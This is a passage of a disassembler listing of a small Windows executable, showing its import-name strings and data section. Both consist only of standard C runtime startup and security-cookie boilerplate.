dd 6C642E30h, 118006Ch, 736D615Fh, 78655F67h, 7469h, 5F5F00A0h
dd 6D746567h, 616E6961h, 736772h, 635F012Fh, 74697865h
dd 17F0000h, 6978655Fh, 670074h, 7063585Fh, 6C694674h
dd 726574h, 695F022Bh, 62626D73h, 6461656Ch, 4D60000h
dd 74697865h, 1030000h, 6D63615Fh, 6E6C64h, 695F020Ah
dd 7474696Eh, 6D7265h, 695F020Bh, 7474696Eh, 5F6D7265h
dd 13F0065h
a_configthreadl db '_configthreadlocale',0
aS db 'é',0
a__setusermathe db '__setusermatherr',0
align 4
dd 615F0111h, 73756A64h, 64665F74h, 7669h, 5F5F00CCh, 635F5F70h
dd 6F6D6D6Fh, 6564h, 5F5F00D0h, 665F5F70h, 65646F6Dh, 16D0000h
dd 636E655Fh, 5F65646Fh, 6E696F70h, 726574h, 5F5F00E6h
dd 5F746573h, 5F707061h, 65707974h, 3ED0000h, 6C6E755Fh
dd 6B636Fh, 5F5F0097h, 6F6C6C64h, 6978656Eh, 27C0074h
dd 636F6C5Fh, 322006Bh, 656E6F5Fh, 746978h, 645F0163h
dd 646F6365h, 6F705F65h, 65746E69h, 1760072h
a_except_handle db '_except_handler4_common',0
dd 695F0211h, 6B6F766Eh, 61775F65h, 6E6F7374h, 1420000h
dd 6E6F635Fh, 6C6F7274h, 735F7066h, 14E0000h
a_crt_debugger_ db '_crt_debugger_hook',0
align 4
db 29h ; )
db 2, 49h, 6Eh
aTerlockedexcha db 'terlockedExchange',0
dw 356h
aSleep db 'Sleep',0
dw 226h
aInterlockedcom db 'InterlockedCompareExchange',0
align 10h
dd 654701B7h, 61745374h, 70757472h, 6F666E49h, 2A30041h
aQueryperforman db 'QueryPerformanceCounter',0
db 0DFh ; ß
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 46h ; F
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 143h
aGetcurrentproc db 'GetCurrentProcessId',0
db 0CAh ; Ê
db 1, 47h, 65h
aTsystemtimeasf db 'tSystemTimeAsFileTime',0
dw 35Eh
aTerminateproce db 'TerminateProcess',0
align 2
dw 142h
aGetcurrentpr_0 db 'GetCurrentProcess',0
dw 36Eh
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
dw 34Ah
aSetunhandledex db 'SetUnhandledExceptionFilter',0
db 39h ; 9
db 2, 49h, 73h
aDebuggerpresen db 'DebuggerPresent',0
dd 656D052Fh, 7970636Dh, 5330000h, 736D656Dh, 7465h, 49h dup(0)
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 00000384 ( 900.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00001800
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 10003000h
dd 2 dup(0FFFFFFFFh)
dword_10003008 dd 0FFFFFFFEh ; DATA XREF: $LN54+CD�r
dword_1000300C dd 1 ; DATA XREF: $LN54+B3�r
dword_10003010 dd 0BB40E64Eh ; DATA XREF: __SEH_prolog4+1D�r
; __except_handler4+15�o ...
dword_10003014 dd 44BF19B1h ; DATA XREF: ___security_init_cookie+29�w
; ___security_init_cookie+89�w ...
dword_10003018 dd 0 ; DATA XREF: _pre_cpp_init+2B�o
dword_1000301C dd 0 ; DATA XREF: _pre_cpp_init+21�o
dword_10003020 dd 0 ; DATA XREF: _pre_cpp_init+26�o
dword_10003024 dd 0 ; DATA XREF: ___tmainCRTStartup+145�r
; ___tmainCRTStartup+199�r ...
dword_10003028 dd 0 ; DATA XREF: _pre_cpp_init+3B�w
dword_1000302C dd 0 ; DATA XREF: _pre_cpp_init+F�o
; _pre_cpp_init+1C�w
dword_10003030 dd 0 ; DATA XREF: ___tmainCRTStartup+140�w
; ___tmainCRTStartup+194�w ...
dword_10003034 dd 0 ; DATA XREF: ___tmainCRTStartup:loc_100010EA�w
; ___tmainCRTStartup:$LN62�r
dword_10003038 dd 0 ; DATA XREF: _pre_cpp_init+16�r
dword_1000303C dd 0 ; DATA XREF: _pre_cpp_init+A�r
dword_10003040 dd 0 ; DATA XREF: $LN54+95�r
dword_10003044 dd 0 ; DATA XREF: $LN54+87�r
dword_10003048 dd 0 ; DATA XREF: ___report_gsfailure+8F�w
; .rdata:ExceptionInfo�o
dword_1000304C dd 0 ; DATA XREF: ___report_gsfailure+99�w
dd 0
dword_10003054 dd 0 ; DATA XREF: ___report_gsfailure+8A�w
dd 10h dup(0)
dword_10003098 dd 0 ; DATA XREF: ___report_gsfailure+BF�w
; ___report_gsfailure+DF�r
align 10h
dword_100030A0 dd 0 ; DATA XREF: ___report_gsfailure+7B�w
; .rdata:ExceptionInfo�o
dd 22h dup(0)
word_1000312C dw 0 ; DATA XREF: ___report_gsfailure+4F�w
align 10h
word_10003130 dw 0 ; DATA XREF: ___report_gsfailure+48�w
align 4
word_10003134 dw 0 ; DATA XREF: ___report_gsfailure+41�w
align 4
word_10003138 dw 0 ; DATA XREF: ___report_gsfailure+3A�w
align 4
dword_1000313C dd 0 ; DATA XREF: ___report_gsfailure+26�w
dword_10003140 dd 0 ; DATA XREF: ___report_gsfailure+20�w
dword_10003144 dd 0 ; DATA XREF: ___report_gsfailure+1A�w
dword_10003148 dd 0 ; DATA XREF: ___report_gsfailure+14�w
dword_1000314C dd 0 ; DATA XREF: ___report_gsfailure+E�w
dword_10003150 dd 0 ; DATA XREF: ___report_gsfailure+9�w
dword_10003154 dd 0 ; DATA XREF: ___report_gsfailure+60�w
dword_10003158 dd 0 ; DATA XREF: ___report_gsfailure+68�w
; ___report_gsfailure+85�r
word_1000315C dw 0 ; DATA XREF: ___report_gsfailure+33�w
align 10h
dword_10003160 dd 0 ; DATA XREF: ___report_gsfailure+57�w
dword_10003164 dd 0 ; DATA XREF: ___report_gsfailure+70�w
word_10003168 dw 0 ; DATA XREF: ___report_gsfailure+2C�w
align 4
dd 25h dup(0)
dd 5Bh dup(?)
dword_1000336C dd ? ; DATA XREF: $LN54+A4�w
dword_10003370 dd ? ; DATA XREF: ___tmainCRTStartup:loc_100010AE�r
; ___tmainCRTStartup:loc_100010C1�r ...
; volatile LONG Destination
Destination dd ? ; DATA XREF: ___tmainCRTStartup+35�o
dword_10003378 dd ? ; DATA XREF: $LN54+77�w __onexit+46�r ...
dword_1000337C dd ? ; DATA XREF: $LN54+7C�w __onexit+C�r ...
dword_10003380 dd ? ; DATA XREF: ___tmainCRTStartup:loc_10001120�r
; ___tmainCRTStartup+DE�o ...
_data ends
end start